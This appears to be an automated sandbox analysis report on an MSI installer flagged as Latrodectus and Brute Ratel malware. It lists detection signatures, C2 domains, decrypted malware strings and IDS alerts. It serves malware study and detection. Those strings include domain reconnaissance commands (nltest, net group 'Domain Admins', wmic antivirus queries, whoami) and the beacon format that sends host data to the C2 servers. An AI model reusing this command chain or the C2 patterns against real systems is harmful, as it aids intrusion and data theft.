Windows Analysis Report
zdi.txt.msi

Overview

General Information

Sample name:	zdi.txt.msi
Analysis ID:	1566849
MD5:	71f04fe0afc51fee5e68e33431a7fb51
SHA1:	81952c2d3bb3558ec36900877080dbae0dc6a8bb
SHA256:	61365e29247428b26c8a6ca0d6326bbd04c2c798d7abad1660338ce3c11c68c4
Tags:	msiTA578user-k3dg3___
Infos:

Detection

BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected BruteRatel

Yara detected Latrodectus

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if browser processes are running

Contains functionality to inject threads in other processes

Contains functionality to steal Internet Explorer form passwords

Creates a thread in another existing process (thread injection)

Drops executables to the windows directory (C:\Windows) and starts them

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Tries to harvest and steal browser information (history, passwords, etc)

Uses ipconfig to lookup or modify the Windows network settings

Uses net.exe to modify the status of services

Uses whoami command line tool to query computer and username

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries device information via Setup API

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Latrodectus, Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://reateberam.com/=	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/32.dll	Avira URL Cloud: Label: malware
Source: https://reateberam.com/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/v	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.binbm	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bin	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42	Avira URL Cloud: Label: malware

Found malware configuration

Source: 9.0.explorer.exe.1370000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c systeminfo
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net view /all
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &ipconfig=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c net config workstation
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &systeminfo=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain_trusts_all=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_view_all=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_group=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &wmic=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &whoami_group=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "pid":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%d",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "proc":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &proclist=[
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "pid":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%d",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "proc":
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s",
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "subproc": [
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &desklinks=[
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "%s"
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Update_%x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Custom_update
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: .exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Error
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: runnung
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s/%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: front
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: /files/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Lambda
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Cookie:
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: POST
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: GET
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: CLEARURL
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: URLS
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: COMMAND
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: ERROR
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: [{"data":"
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: "}]
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &dpost=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: https://reateberam.com/test/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: https://dogirafer.com/test/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \*.dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: AppData
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Desktop
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Startup
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Personal
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Local AppData
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: <html>
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s%d.dll
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: 12345
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: 12345
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &stiller=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %s%d.exe
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %x%x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &mac=
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %02x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: :%02x
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &computername=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: &domain=%s
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: LogonTrigger
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: TimeTrigger
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: PT0S
Source: 9.0.explorer.exe.1370000.0.raw.unpack	String decryptor: \update_data.dat

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D5E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,	9_2_0B8D5E5C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D5FE4 CryptUnprotectData,	9_2_0B8D5FE4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,	9_2_0B8D6078
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,	9_2_0B8D453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D8568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,	9_2_0B8D8568

Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49967 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr
Source:	Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmp, wait.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00C4B02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	5_2_00007FFDFA922E90
Source: C:\Windows\explorer.exe	Code function: 9_2_0137A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0137A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_01372B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_01372B28
Source: C:\Windows\explorer.exe	Code function: 9_2_013804C0 FindFirstFileW,	9_2_013804C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D16F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0B8D16F4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0B8D6604

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49865 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49885 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49873 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49904 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49914 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49879 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49929 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49940 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49934 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49953 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49974 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49962 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49956 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49946 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49967 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50013 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49982 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50020 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50027 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50034 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49988 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50037 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50043 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50033 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50038 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50049 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50051 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50035 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50039 -> 104.21.16.251:443
